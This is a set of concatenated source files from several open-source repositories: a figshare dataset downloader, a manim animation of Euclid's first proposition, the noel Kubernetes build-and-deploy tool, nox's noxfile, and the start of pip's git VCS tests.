'players' : 'https://ndownloader.figshare.com/files/15073721',
'teams': 'https://ndownloader.figshare.com/files/15073697',
'competitions': 'https://ndownloader.figshare.com/files/15073685'
}
print ("Downloading matches data")
r = requests.get(dataset_links['matches'], stream=True)
z = zipfile.ZipFile(io.BytesIO(r.content))
z.extractall("data/matches")
print ("Downloading teams data")
r = requests.get(dataset_links['teams'], stream=False)
print (r.text, file=open('data/teams.json','w'))
print ("Downloading players data")
r = requests.get(dataset_links['players'], stream=False)
print (r.text, file=open('data/players.json','w'))
print ("Downloading competitions data")
r = requests.get(dataset_links['competitions'], stream=False)
print (r.text, file=open('data/competitions.json','w'))
print ("Downloading events data")
r = requests.get(dataset_links['events'], stream=True)
z = zipfile.ZipFile(io.BytesIO(r.content))
z.extractall("data/events")
print ("Download completed")
``` |
{
"source": "jonparkdev/my-manim-animations",
"score": 3
} |
#### File: my_animations/Euclid/euclid_b1_p1.py
```python
from manimlib.imports import *
class SceneOne(Scene):
def construct(self):
self.title_sequence()
self.wait()
def title_sequence(self):
title = TextMobject("Euclid's Elements", fill_color=BLACK).scale(2)
book = TextMobject("Book ").scale(1.5)
proposition = TextMobject("Proposition ").scale(1.5)
book_number = Integer(13).scale(1.5).next_to(book, RIGHT)
proposition_number = Integer(465).scale(1.5).next_to(proposition, RIGHT)
book_group = VGroup(book, book_number)
proposition_group = VGroup(proposition, proposition_number).next_to(book_group, DOWN)
anim_group = VGroup(book_group, proposition_group).move_to(ORIGIN)
rules = TextMobject("Rules of the Game:").scale(1.2)
rule1 = TexMobject("\\cdot \\text{ A claim is made asserting something to be true}").move_to(UP * .5 + LEFT * 5, LEFT)
rule2 = TexMobject("\\cdot \\text{ Straight edge and compass }").move_to(DOWN * .5 + LEFT * 5, LEFT)
rule3 = TexMobject("\\cdot \\text{ Prove it!}").move_to(1.5 * DOWN + LEFT * 5, LEFT)
def animate_numbers(low_num, high_num, final_num):
def func(alpha):
if(alpha == 1):
return final_num
return np.random.uniform(low_num, high_num)
return func
self.play(Write(title), run_time=2)
self.wait(4)
self.play(FadeOut(title))
self.play(Write(rules), run_time=2)
self.play(ApplyMethod(rules.shift, 2 * UP + 3 * LEFT))
self.play(FadeIn(rule1))
self.wait(10)
self.play(FadeIn(rule2))
self.wait(10)
self.play(FadeIn(rule3))
self.wait(10)
self.play(FadeOut(rule1),FadeOut(rule2),FadeOut(rule3))
self.play(
ReplacementTransform(rules,anim_group),
)
self.play(
ChangingDecimal(book_number, animate_numbers(1, 13, 1)).set_run_time(3),
ChangingDecimal(proposition_number, animate_numbers(1, 465, 1)).set_run_time(4)
)
self.wait(1)
self.play(FadeOut(anim_group))
def scene_two(self):
pass
class Problem(Scene):
def construct(self):
self.move_line()
def move_line(self):
point_a = self.a = Dot(LEFT, color=BLACK)
point_b = self.b = Dot(RIGHT, color=BLACK)
line = self.initial_line = Line(point_a, point_b, stroke_width=6, color=BLACK)
self.wait()
self.play(FadeIn(line),FadeIn(point_a),FadeIn(point_b))
self.wait()
self.move_points()
def move_points(self):
np.random.seed(41)
movement_list_a = list(
zip(
np.random.random(3)*negative_or_positive(2),
np.random.random(3)*negative_or_positive(2),
[0, 0, 0,]
)
)
np.random.seed(42)
movement_list_b = list(
zip(
np.random.random(3)*negative_or_positive(2),
np.random.random(3)*negative_or_positive(2),
[0, 0, 0,]
)
)
count = 0
for a, b in zip(movement_list_a,movement_list_b):
if count % 2 == 0:
array_a = np.array(a) * -1
array_b = np.array(b) * -1
else:
array_a = np.array(a)
array_b = np.array(b)
count = count + 1
self.play(
ApplyMethod(
self.initial_line.put_start_and_end_on,
array_a,
array_b
),
ApplyMethod(self.a.move_to, array_a),
ApplyMethod(self.b.move_to, array_b)
)
self.wait()
length = self.initial_line.get_length()
left = self.a.get_center()
right = self.b.get_center()
positive_intersection, negative_intersection = get_circle_intersection(left, right, length, length)
if np.linalg.norm(positive_intersection) < np.linalg.norm(negative_intersection):
triangle_point = positive_intersection
else:
triangle_point = negative_intersection
triangle_point_mob= Dot(triangle_point, color=BLACK)
line_with_a= Line(self.a, triangle_point_mob, stroke_width=6,color=BLACK)
line_with_b= Line(self.b, triangle_point_mob, stroke_width=6, color=BLACK)
triangle = Polygon(
triangle_point,
left,
right
).set_stroke(color=None, width=0)
triangle.set_fill(BLACK, opacity = 0.5)
self.play(
FadeIn(triangle),
FadeIn(triangle_point_mob),
FadeIn(line_with_a),
FadeIn(line_with_b)
)
self.play(
FadeOut(triangle),
FadeOut(triangle_point_mob),
FadeOut(line_with_a),
FadeOut(line_with_b)
)
self.play(
ApplyMethod(
self.initial_line.put_start_and_end_on,
LEFT,
RIGHT
),
ApplyMethod(self.a.move_to, LEFT),
ApplyMethod(self.b.move_to, RIGHT)
)
self.wait()
self.play(Uncreate(self.initial_line))
self.wait()
# animations = [
# self.update_point_mob(self.a, movement) for movement in movement_list
# ]
# for anim in animations:
# self.play(anim)
class Construction(Scene):
CONFIG = {
"left_circle_center" : LEFT,
"right_circle_center" : RIGHT,
"random_seed" : 4,
"radius" : 2,
"point_color" : BLACK,
}
def construct(self):
self.initial_line()
def initial_line(self):
# create objects
radius_a = DashedLine(LEFT, RIGHT, color=BLACK)
radius_b = DashedLine(RIGHT, LEFT, color=BLACK).flip(LEFT)
positive_intersection, negative_intersection = get_circle_intersection(LEFT, RIGHT, self.radius, self.radius)
point_c = Dot(positive_intersection, color=self.point_color)
lower_point= Dot(negative_intersection, color=self.point_color)
line_ab = Line(LEFT, RIGHT, stroke_width=6, color=self.point_color)
circle_about_a = Circle(radius=self.radius, stroke_width=6,arc_center=LEFT, color=BYRNE_BLUE)
point_a = self.point_a = Dot(LEFT , color=self.point_color)
line_ac = Line(LEFT, point_c,stroke_width=6, color=BYRNE_YELLOW)
circle_about_b = Circle(radius=self.radius,stroke_width=6, arc_center=RIGHT, color=BYRNE_RED).flip()
point_b = Dot(RIGHT, color=self.point_color)
line_bc = Line(RIGHT, point_c,stroke_width=6, color=BYRNE_RED)
a_group = VGroup(
circle_about_a,
line_ac,
point_c,
line_ab,
point_b.copy(),
point_a,
)
copy_line_ab = line_ab.copy()
b_group = VGroup(
circle_about_b,
line_bc,
point_c.copy(),
point_a.copy(),
copy_line_ab,
point_b,
)
starting_line_ab = Line(point_a, point_b, stroke_width=6, color=BLACK)
self.add(starting_line_ab)
self.add(point_a)
self.add(point_b)
self.wait(3)
postulate = TextMobject("Postulate 3").move_to(2* UP)
self.play(Write(postulate))
self.wait(2)
self.play(FadeOut(postulate))
self.play(Uncreate(starting_line_ab))
self.wait(2)
# Construct circle about point A
self.play(ShowCreation(radius_a))
self.wait(2)
self.play(
ShowCreation(circle_about_a),
Rotating(radius_a, angle = 2*np.pi, about_point = LEFT),
rate_func = smooth,
run_time = 2,
)
self.play(ShowCreation(
radius_a,
rate_func = lambda t: smooth(1-t),
remover = True
))
# Construct circle about point B
self.play(ShowCreation(radius_b))
self.play(
ShowCreation(circle_about_b),
Rotating(radius_b, axis = IN, angle = 2*np.pi, about_point = RIGHT),
rate_func = smooth,
run_time = 2,
)
self.play(ShowCreation(
radius_b,
rate_func = lambda t: smooth(1-t),
remover = True
))
# Add initial line back
self.play(ShowCreation(line_ab))
self.wait(4)
self.play(FadeIn(point_c), FadeIn(lower_point))
self.wait(4)
self.play(FadeOut(lower_point))
self.wait(2)
# construct new lines
postulate1 = TextMobject("Postulate 1").move_to(3* UP)
self.play(Write(postulate1))
self.wait(2)
self.play(FadeOut(postulate1))
self.wait(2)
self.play(ShowCreation(line_ac))
self.wait(1)
self.play(ShowCreation(line_bc))
self.wait(4)
rotating_group = VGroup(line_ab, line_bc, line_ac, point_a, point_b, point_c)
about_point = rotating_group.get_center()
line_triangle = Line(about_point, DOWN, opacity=0)
move_group = VGroup(rotating_group, line_triangle)
self.play(FadeOut(circle_about_a), FadeOut(circle_about_b))
self.wait(5)
self.play(Rotating(rotating_group, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/3))
self.wait(.75)
self.play(Rotating(rotating_group, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/3))
self.wait(.75)
self.play(Rotating(rotating_group, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/3))
self.wait(.75)
self.play(Rotating(rotating_group, axis=UP, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/2))
self.wait(.75)
self.play(Rotating(rotating_group, axis=DOWN, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/2))
self.wait(.75)
self.play(Rotating(rotating_group, axis=RIGHT, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/2))
self.wait(.75)
self.play(Rotating(rotating_group, axis=LEFT, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/2))
self.wait(4)
self.play(FadeIn(circle_about_a), FadeIn(circle_about_b))
self.wait(3)
self.play(
ApplyMethod(a_group.shift, LEFT * 1.5),
ApplyMethod(b_group.shift, RIGHT * 1.5)
)
self.wait(2)
self.play(
WiggleOutThenIn(line_ab, rotation_angle=.05 * TAU, scale_value=.7),
)
self.play(
WiggleOutThenIn(line_ac, rotation_angle=.05 * TAU, scale_value=.7)
)
# compass animation
replaced_line_ab= line_ab.copy()
self.play(ReplacementTransform(line_ab, replaced_line_ab))
self.wait(5)
self.play(Uncreate(replaced_line_ab))
compass_point = point_a.get_center() + RIGHT * self.radius
compass_point_mob = self.compass_point_mob = Dot(compass_point, color=BLACK)
compass_line = self.compass_line = DashedLine(point_a.get_center(), compass_point_mob, color=BLACK)
line_ac_angle = (np.pi/2) - angle_of_vector(point_c.get_center() - point_a.get_center())
n_thetas = [-np.pi/2]*3 + [-line_ac_angle]
self.play(ShowCreation(compass_line))
self.play(FadeIn(compass_point_mob))
self.wait(1.5)
self.change_points(n_thetas , point_a.get_center())
# fade_lines = [FadeOut(line) for line, point in self.example_lines]
remove_example_lines = [FadeOut(mob) for mob in it.chain(*self.example_lines)]
self.play(*remove_example_lines)
self.remove_compass(n_thetas, point_a.get_center())
self.play(Uncreate(self.compass_line))
self.remove(compass_point_mob)
self.play(ShowCreation(line_ab))
self.play(
WiggleOutThenIn(line_ab, rotation_angle=.05 * TAU, scale_value=.7),
)
self.play(
WiggleOutThenIn(line_ac, rotation_angle=.05 * TAU, scale_value=.7),
)
self.wait(2)
self.play(
WiggleOutThenIn(copy_line_ab, rotation_angle=.05 * TAU, scale_value=.7)
)
self.play(
WiggleOutThenIn(line_bc, rotation_angle=.05 * TAU, scale_value=.7)
)
self.wait(3)
self.play(
ApplyMethod(a_group.shift, RIGHT * 1.5),
ApplyMethod(b_group.shift, LEFT * 1.5)
)
self.remove(copy_line_ab)
self.play(
WiggleOutThenIn(line_bc, rotation_angle=.05 * TAU, scale_value=.7),
WiggleOutThenIn(line_ac, rotation_angle=.05 * TAU, scale_value=.7),
)
self.play(
WiggleOutThenIn(line_ab, rotation_angle=.05 * TAU, scale_value=.7),
)
self.wait()
common_notion = TextMobject("Common Notion 1").move_to(3* UP)
self.play(Write(common_notion))
self.wait(4)
self.play(FadeOut(common_notion))
self.play(
FadeOut(circle_about_a),
FadeOut(circle_about_b)
)
a_group.remove(circle_about_a)
b_group.remove(circle_about_b)
self.wait(3.5)
self.play(
WiggleOutThenIn(line_bc, rotation_angle=.05 * TAU, scale_value=.7),
WiggleOutThenIn(line_ac, rotation_angle=.05 * TAU, scale_value=.7),
WiggleOutThenIn(line_ab, rotation_angle=.05 * TAU, scale_value=.7),
)
self.wait(2)
# self.play(
# ApplyMethod(a_group.shift, RIGHT * 1.5),
# ApplyMethod(b_group.shift, LEFT * 1.5)
# )
triangle = Polygon(
point_a.get_center(),
point_b.get_center(),
point_c.get_center()
).set_fill(
BLACK, opacity=.3
).set_stroke(
color=None, width=0
)
self.play(FadeIn(triangle))
self.wait(3)
qed = TextMobject("Being what it was required to do.").next_to(a_group, DOWN*2)
self.play(Write(qed))
self.wait(2)
'''
Helper functions
'''
def get_compass_point_update(self, pm, d_theta, circle_center,func=smooth, run=1):
current_theta = angle_of_vector(pm.get_center() - circle_center)
new_theta = current_theta + d_theta
def update_point(point_mob, alpha):
theta = interpolate(current_theta, new_theta, alpha)
point_mob.move_to(circle_center + self.radius * (
np.cos(theta)*RIGHT + np.sin(theta)*UP
))
return point_mob
return UpdateFromAlphaFunc(pm, update_point, rate_func=func, run_time=run)
def get_compass_update(self, circle_center):
def update_compass(line):
point = self.compass_point_mob.get_center() - circle_center
line.rotate(
(angle_of_vector(point) - line.get_angle()),
about_point=circle_center
)
return line
return UpdateFromFunc(self.compass_line, update_compass, rate_func=smooth)
def change_points(self, n_thetas, circle_center):
self.example_lines = []
example_line = DashedLine(circle_center, self.compass_point_mob, color=BLACK)
example_point = Dot(self.compass_point_mob.get_center(), color=BLACK)
self.example_lines.append((example_line,example_point))
self.add(example_line, example_point, self.point_a)
for theta in n_thetas:
self.wait(.5)
self.play(
self.get_compass_point_update(
self.compass_point_mob, theta , circle_center
),
self.get_compass_update(circle_center)
)
example_line = DashedLine(circle_center, self.compass_point_mob, color=BLACK)
example_point = Dot(self.compass_point_mob.get_center(), color=BLACK)
self.example_lines.append((example_line,example_point))
self.add(example_line, example_point, self.point_a)
def remove_compass(self, n_thetas, circle_center):
# total_theta = -sum(n_thetas)
theta = sum(n_thetas)
self.play(
self.get_compass_point_update(
self.compass_point_mob, -theta , circle_center
),
self.get_compass_update(circle_center),
)
def pop_lines(self, circle_center):
def pop(mobject, alpha):
point = angle_of_vector(self.compass_point_mob.get_center() - circle_center)
d_theta = (point+ np.pi)%(2*np.pi) - np.pi
print(d_theta, mobject.get_angle())
if point >= mobject.get_angle():
print('here')
FadeOut(mobject)
return mobject
return UpdateFromAlphaFunc(self.example_lines[3], pop,rate_func=smooth, run_time=1)
def get_point_mobs(self, origin):
points = np.array([
origin + rotate_vector(self.radius*RIGHT, theta)
for theta in np.random.uniform(np.pi/2, 7 * np.pi/8, size=3)
])
point_mobs = self.point_mobs = VGroup(*[
Dot().move_to(point) for point in points
])
point_mobs.set_color(self.point_color)
return point_mobs
def negative_or_positive(max_num):
return max_num * 1 if np.random.random() < 0.5 else -1 * max_num
def get_circle_intersection(origin_a, origin_b, r_1, r_2):
"""(numpy R^3 array, numpy R^3 array, float, float) -> numpy R^3 array
Returns the intersection point(s) of two circles given the origin
coordinates,origin_a and origin_b, of each circle and radii r_1, r_2
pre-conditions:
- The two given circles intersect at > 0 points
"""
# For now we will be working in 2D space and will ignore the z
# coordinate
x_1, y_1, z_1 = origin_a
x_2, y_2, z_2 = origin_b
"""
Our algorithm,
Strictly using algebraic equations of our circles,
(1) (x-x_1)^2 + (y-y_1)^2 = r_1^2
(2) (x-x_2)^2 + (y-y_2)^2 = r_2^2
Subtracting (2) from (1) and magically rearranging we get,
y = -[(x_1 - x_2)/(y_1 - y_2)]x +
[(r_1^2-r_2^2)-(x_1^2-x_2^2)-(y_1^2-y_2^2)] / (-2 * (y_1 - y_2))
let v = [(r_1^2-r_2^2)-(x_1^2-x_2^2)-(y_1^2-y_2^2)] / (-2 * (y_1 - y_2)) so,
(3) y = -[(x_1 - x_2)/(y_1 - y_2)]x + v
Substituting our y back into (1) and some more algebra we get the
quadratic (if you're thinking that looks tedious, you are correct):
(x-x_1)^2 + (-[(x_1 - x_2)/(y_1 - y_2)]x + v - y_1)^2 = r_1^2
.
.
.
Some quadratic formula
Then use quadratic formula to solve for x, then use x in (3) to solve
for y
"""
# handle the degenerate case (same centre) and pick which axis to solve along
if y_1 == y_2 and x_1 == x_2:
raise ValueError("circles cannot be centred on the same origin")
elif y_1 == y_2:
# Denoting constant values in above formulas
constant = (y_1-y_2)/(x_1-x_2)
v = ((r_1**2-r_2**2)-(x_1**2-x_2**2)-(y_1**2-y_2**2)) / ((-2) * (x_1 - x_2))
root = 'y'
else:
# Denoting constant values in above formulas
constant = (x_1-x_2)/(y_1-y_2)
v = ((r_1**2-r_2**2)-(x_1**2-x_2**2)-(y_1**2-y_2**2)) / ((-2) * (y_1 - y_2))
root = 'x'
if (root == 'x'):
# quadratic formula to find roots along the x-axis
a = (1.0 + constant**2)
b = (-2) * (x_1 + (constant * (v - y_1)))
c = x_1**2 + (v - y_1)**2 - r_1**2
positive_x = ((-b) + np.sqrt(b**2 - 4*a*c)) / (2 * a)
negative_x = ((-b) - np.sqrt(b**2 - 4*a*c)) / (2 * a)
positive_y = (-constant) * positive_x + v
negative_y = (-constant) * negative_x + v
else:
# quadratic formula to find the roots along the y-axis
a = (1 + constant**2)
b = -2 * (y_1 + (constant * (v - x_1)))
c = y_1**2 + (v - x_1)**2 - r_1**2
positive_y = ((-b) + np.sqrt(b**2 - 4*a*c)) / (2 * a)
negative_y = ((-b) - np.sqrt(b**2 - 4*a*c)) / (2 * a)
positive_x = (-constant) * positive_y + v
negative_x = (-constant) * negative_y + v
return [np.array((positive_x, positive_y, 0)), np.array((negative_x, negative_y, 0))]
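# Worked example (illustrative): two circles of radius 2 centred at LEFT = (-1, 0, 0)
# and RIGHT = (1, 0, 0) -- the configuration used in the scenes above -- intersect where
# x = 0 and y**2 = 4 - 1 = 3, so get_circle_intersection(LEFT, RIGHT, 2, 2) returns
# (0, +sqrt(3), 0) and (0, -sqrt(3), 0), the apexes of Proposition 1's equilateral triangle.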
``` |
{
"source": "jonparrott/noel",
"score": 3
} |
#### File: noel/builder/docker.py
```python
from noel.utils import call
def build(tag_name, context_dir):
call('docker', 'build', '-t', tag_name, context_dir)
def push(tag_name, use_gcloud=False):
"""Pushes an image to a repository.
Because Noel uses Google Container Registry, this has logic to use the
Google Cloud SDK to push the image. If you're not using GCR, you'll need
to make sure login is called before calling this.
"""
if not use_gcloud:
call('docker', 'push', tag_name)
else:
# When not on GCE/GKE, use gcloud to push. gcloud will handle
# authentication.
call('gcloud', 'docker', 'push', tag_name)
def login(host, token):
call('docker', 'login', '-e', '<EMAIL>', '-u', '_token',
'-p', token, host)
```
#### File: noel/builder/remote.py
```python
from noel.kubernetes import KubernetesError
from noel.utils import call
def get_ingress_ip(k8s, service_name):
"""Gets the public IP address of the service that maps to the remote
builder."""
service = k8s.get_service(service_name)
try:
return service['status']['loadBalancer']['ingress'][0]['ip']
except KeyError:
raise KubernetesError(
'Service {} does not have an external load balancer.'.format(
service_name))
def add_git_remote(remote_name, remote_url):
"""Adds a given remote to the repository in the current directory."""
call(
'git',
'remote',
'add',
remote_name,
remote_url)
def add_builder_git_remote(k8s, app, remote_name):
"""Adds the remote builder as a git remote to the repository in the current
directory."""
ip = get_ingress_ip(k8s, 'builder')
port = 2122
user = 'git'
url = 'ssh://{}@{}:{}/{}'.format(user, ip, port, app)
add_git_remote(remote_name, url)
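# Example (illustrative, hypothetical values): with app="myapp" and an ingress IP of
# 203.0.113.5, the resulting remote URL is ssh://git@203.0.113.5:2122/myapp.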
```
#### File: noel/deployer/templates.py
```python
import yaml
from jinja2 import Template
from pkg_resources import resource_string
APP_SERVICE_TMPL = Template(
resource_string(__name__, 'resources/app-service.tmpl.yaml'))
APP_RC_TMPL = Template(
resource_string(__name__, 'resources/app-rc.tmpl.yaml'))
APP_SECRET_TMPL = Template(
resource_string(__name__, 'resources/app-secret.tmpl.yaml'))
def app_service(name):
return yaml.load(APP_SERVICE_TMPL.render(name=name))
def app_replicationcontroller(name, build_version, image, config):
return yaml.load(APP_RC_TMPL.render(
name=name,
build_version=build_version,
image=image,
config=config))
def app_secret(name, data):
return yaml.load(APP_SECRET_TMPL.render(name=name, data=data))
```
#### File: noel/noel/main.py
```python
import argparse
import os
import noel.builder.commands
import noel.deployer.commands
from noel.utils import run_command
def build_and_deploy_command(args):
"""Build an application image and deploy it to the cluster. This
essentially runs build and then deploy-image."""
image = noel.builder.commands.build_command(args)
args.image = image
noel.deployer.commands.deploy_image_command(args)
def main():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
parser.add_argument(
'--kubernetes-url',
default='http://localhost:8001',
help="The URL for the Kubernetes API.")
noel.builder.commands.register_commands(subparsers)
noel.deployer.commands.register_commands(subparsers)
build_and_deploy = subparsers.add_parser(
'build-and-deploy',
help=build_and_deploy_command.__doc__)
build_and_deploy.set_defaults(func=build_and_deploy_command)
build_and_deploy.add_argument(
'--project-id',
default=None,
help='Google Cloud Project ID, if not specified, it will use gcloud\'s '
'currently configured project.')
build_and_deploy.add_argument(
'--dir',
default=os.getcwd(),
help='Directory containing application and Dockerfile. Defaults to the '
'current directory.')
build_and_deploy.add_argument(
'--app',
default=os.path.basename(os.getcwd()),
help='The application name. Defaults to the name of the directory.')
build_and_deploy.add_argument(
'--version',
default=None,
help='The image tag version. Defaults to the current date & time.')
run_command(parser)
```
#### File: src/ssh_host_keys_manager/main.py
```python
import argparse
import os
import sys
from subprocess import check_call
import time
from jinja2 import Template
from noel.kubernetes import Kubernetes, KubernetesError
from noel.logger import logger, setup_logging
import requests
from pkg_resources import resource_string
import yaml
def wait_for_kubernetes(k8s):
tries = 5
sys.stdout.write('Waiting for kubeproxy.')
while True:
try:
requests.get(k8s._api_root)
sys.stdout.write(' done.\n')
return
except requests.exceptions.ConnectionError:
if tries == 0:
sys.stdout.write(' failed.\n')
sys.exit(1)
tries -= 1
sys.stdout.write('.')
time.sleep(5)
def get_host_keys(k8s):
try:
return k8s.get_secret('ssh-host-keys')['data']
except KubernetesError:
return None
SSH_HOST_KEY_SECRET_TMPL = Template(
resource_string(__name__, 'resources/ssh-host-key-secret.tmpl.yaml'))
def ssh_host_key_secret_template(name='ssh-host-keys'):
return yaml.load(SSH_HOST_KEY_SECRET_TMPL.render(name=name))
def put_host_keys(k8s, keys):
spec = ssh_host_key_secret_template()
spec['data'] = keys
k8s.create_secret(spec)
def generate_ssh_host_keys(destination):
dsa_key_path = os.path.join(destination, 'ssh_host_dsa_key')
rsa_key_path = os.path.join(destination, 'ssh_host_rsa_key')
ecdsa_key_path = os.path.join(destination, 'ssh_host_ecdsa_key')
for path in [dsa_key_path, rsa_key_path, ecdsa_key_path]:
if os.path.exists(path):
os.unlink(path)
check_call(['ssh-keygen', '-q', '-t', 'dsa', '-N', '', '-f', dsa_key_path])
check_call(['ssh-keygen', '-q', '-t', 'rsa', '-N', '', '-f', rsa_key_path])
check_call(
['ssh-keygen', '-q', '-t', 'ecdsa', '-N', '', '-f', ecdsa_key_path])
for path in [dsa_key_path, rsa_key_path, ecdsa_key_path]:
os.chmod(path, 0o600)
return {
'dsa': open(dsa_key_path, 'r').read(),
'rsa': open(rsa_key_path, 'r').read(),
'ecdsa': open(ecdsa_key_path, 'r').read()
}
def write_ssh_host_keys(destination, keys):
dsa_key_path = os.path.join(destination, 'ssh_host_dsa_key')
rsa_key_path = os.path.join(destination, 'ssh_host_rsa_key')
ecdsa_key_path = os.path.join(destination, 'ssh_host_ecdsa_key')
for path in [dsa_key_path, rsa_key_path, ecdsa_key_path]:
if os.path.exists(path):
os.unlink(path)
with open(dsa_key_path, 'w') as f:
f.write(keys['dsa'])
with open(rsa_key_path, 'w') as f:
f.write(keys['rsa'])
with open(ecdsa_key_path, 'w') as f:
f.write(keys['ecdsa'])
for path in [dsa_key_path, rsa_key_path, ecdsa_key_path]:
os.chmod(path, 0o600)
def run(args):
k8s = Kubernetes(args.kubernetes_url, namespace='noel')
wait_for_kubernetes(k8s)
keys = get_host_keys(k8s)
if keys:
logger.info('Existing ssh host keys found.')
write_ssh_host_keys(args.destination, keys)
return
logger.warning('No existing ssh host keys. Generating keys.')
keys = generate_ssh_host_keys(args.destination)
try:
put_host_keys(k8s, keys)
logger.info('Host keys saved to Kubernetes.')
except KubernetesError as e:
if e.httperror.response.status_code == 409:
logger.error(
'Conflict while writing ssh keys to Kubernetes, retrying...')
return run(args)
else:
logger.exception('Unexpected error while writing ssh host keys.')
raise
def main():
setup_logging()
parser = argparse.ArgumentParser()
parser.add_argument(
'--kubernetes-url',
default='http://localhost:8001',
help='The URL for the Kubernetes API.')
parser.add_argument('--destination', default='/etc/ssh')
args = parser.parse_args()
run(args)
if __name__ == "__main__":
main()
``` |
{
"source": "jonparrott/nox",
"score": 2
} |
#### File: jonparrott/nox/noxfile.py
```python
from __future__ import annotations
import functools
import os
import platform
import shutil
import nox
ON_WINDOWS_CI = "CI" in os.environ and platform.system() == "Windows"
# Skip 'conda_tests' if user doesn't have conda installed
nox.options.sessions = ["tests", "cover", "lint", "docs"]
if shutil.which("conda"):
nox.options.sessions.append("conda_tests")
@nox.session(python=["3.7", "3.8", "3.9", "3.10"])
def tests(session: nox.Session) -> None:
"""Run test suite with pytest."""
session.create_tmp() # Fixes permission errors on Windows
session.install("-r", "requirements-test.txt")
session.install("-e", ".[tox_to_nox]")
session.run(
"pytest",
"--cov=nox",
"--cov-config",
"pyproject.toml",
"--cov-report=",
*session.posargs,
env={"COVERAGE_FILE": f".coverage.{session.python}"},
)
session.notify("cover")
@nox.session(python=["3.7", "3.8", "3.9", "3.10"], venv_backend="conda")
def conda_tests(session: nox.Session) -> None:
"""Run test suite with pytest."""
session.create_tmp() # Fixes permission errors on Windows
session.conda_install(
"--file", "requirements-conda-test.txt", "--channel", "conda-forge"
)
session.install("-e", ".", "--no-deps")
session.run("pytest", *session.posargs)
@nox.session
def cover(session: nox.Session) -> None:
"""Coverage analysis."""
if ON_WINDOWS_CI:
return
session.install("coverage[toml]")
session.run("coverage", "combine")
session.run("coverage", "report", "--fail-under=100", "--show-missing")
session.run("coverage", "erase")
@nox.session(python="3.9")
def lint(session: nox.Session) -> None:
"""Run pre-commit linting."""
session.install("pre-commit")
session.run(
"pre-commit",
"run",
"--all-files",
"--show-diff-on-failure",
"--hook-stage=manual",
*session.posargs,
)
@nox.session
def docs(session: nox.Session) -> None:
"""Build the documentation."""
output_dir = os.path.join(session.create_tmp(), "output")
doctrees, html = map(
functools.partial(os.path.join, output_dir), ["doctrees", "html"]
)
shutil.rmtree(output_dir, ignore_errors=True)
session.install("-r", "requirements-test.txt")
session.install(".")
session.cd("docs")
sphinx_args = ["-b", "html", "-W", "-d", doctrees, ".", html]
if not session.interactive:
sphinx_cmd = "sphinx-build"
else:
sphinx_cmd = "sphinx-autobuild"
sphinx_args.insert(0, "--open-browser")
session.run(sphinx_cmd, *sphinx_args)
# The following sessions are only to be run in CI to check the nox GHA action
def _check_python_version(session: nox.Session) -> None:
if session.python.startswith("pypy"):
python_version = session.python[4:]
implementation = "pypy"
else:
python_version = session.python
implementation = "cpython"
session.run(
"python",
"-c",
"import sys; assert '.'.join(str(v) for v in sys.version_info[:2]) =="
f" '{python_version}'",
)
if python_version[:2] != "2.":
session.run(
"python",
"-c",
f"import sys; assert sys.implementation.name == '{implementation}'",
)
@nox.session(python=["3.7", "3.8", "3.9", "3.10", "pypy3.7", "pypy3.8", "pypy3.9"])
def github_actions_default_tests(session: nox.Session) -> None:
"""Check default versions installed by the nox GHA Action"""
_check_python_version(session)
``` |
{
"source": "jonparrott/pip",
"score": 2
} |
#### File: tests/functional/test_install_vcs_git.py
```python
import pytest
from mock import patch
from pip.vcs.git import Git
from tests.lib import _create_test_package
from tests.lib.git_submodule_helpers import (
_change_test_package_submodule, _create_test_package_with_submodule,
_pull_in_submodule_changes_to_module
)
@pytest.mark.network
def test_get_short_refs_should_return_tag_name_and_commit_pair(script):
version_pkg_path = _create_test_package(script)
script.run('git', 'tag', '0.1', cwd=version_pkg_path)
script.run('git', 'tag', '0.2', cwd=version_pkg_path)
commit = script.run(
'git', 'rev-parse', 'HEAD',
cwd=version_pkg_path
).stdout.strip()
git = Git()
result = git.get_short_refs(version_pkg_path)
assert result['0.1'] == commit, result
assert result['0.2'] == commit, result
@pytest.mark.network
def test_get_short_refs_should_return_branch_name_and_commit_pair(script):
version_pkg_path = _create_test_package(script)
script.run('git', 'branch', 'branch0.1', cwd=version_pkg_path)
commit = script.run(
'git', 'rev-parse', 'HEAD',
cwd=version_pkg_path
).stdout.strip()
git = Git()
result = git.get_short_refs(version_pkg_path)
assert result['master'] == commit, result
assert result['branch0.1'] == commit, result
@pytest.mark.network
def test_get_short_refs_should_ignore_no_branch(script):
version_pkg_path = _create_test_package(script)
script.run('git', 'branch', 'branch0.1', cwd=version_pkg_path)
commit = script.run(
'git', 'rev-parse', 'HEAD',
cwd=version_pkg_path
).stdout.strip()
# current branch here is "* (nobranch)"
script.run(
'git', 'checkout', commit,
cwd=version_pkg_path,
expect_stderr=True,
)
git = Git()
result = git.get_short_refs(version_pkg_path)
assert result['master'] == commit, result
assert result['branch0.1'] == commit, result
@pytest.mark.network
def test_check_version(script):
version_pkg_path = _create_test_package(script)
script.run('git', 'branch', 'branch0.1', cwd=version_pkg_path)
commit = script.run(
'git', 'rev-parse', 'HEAD',
cwd=version_pkg_path
).stdout.strip()
git = Git()
assert git.check_version(version_pkg_path, [commit])
assert git.check_version(version_pkg_path, [commit[:7]])
assert not git.check_version(version_pkg_path, ['branch0.1'])
assert not git.check_version(version_pkg_path, ['abc123'])
@patch('pip.vcs.git.Git.get_short_refs')
def test_check_rev_options_should_handle_branch_name(get_refs_mock):
get_refs_mock.return_value = {'master': '123456', '0.1': '123456'}
git = Git()
result = git.check_rev_options('master', '.', [])
assert result == ['123456']
@patch('pip.vcs.git.Git.get_short_refs')
def test_check_rev_options_should_handle_tag_name(get_refs_mock):
get_refs_mock.return_value = {'master': '123456', '0.1': '123456'}
git = Git()
result = git.check_rev_options('0.1', '.', [])
assert result == ['123456']
@patch('pip.vcs.git.Git.get_short_refs')
def test_check_rev_options_should_handle_ambiguous_commit(get_refs_mock):
get_refs_mock.return_value = {'master': '123456', '0.1': '123456'}
git = Git()
result = git.check_rev_options('0.1', '.', [])
assert result == ['123456'], result
# TODO(pnasrat) fix all helpers to do right things with paths on windows.
@pytest.mark.skipif("sys.platform == 'win32'")
@pytest.mark.network
def test_check_submodule_addition(script):
"""
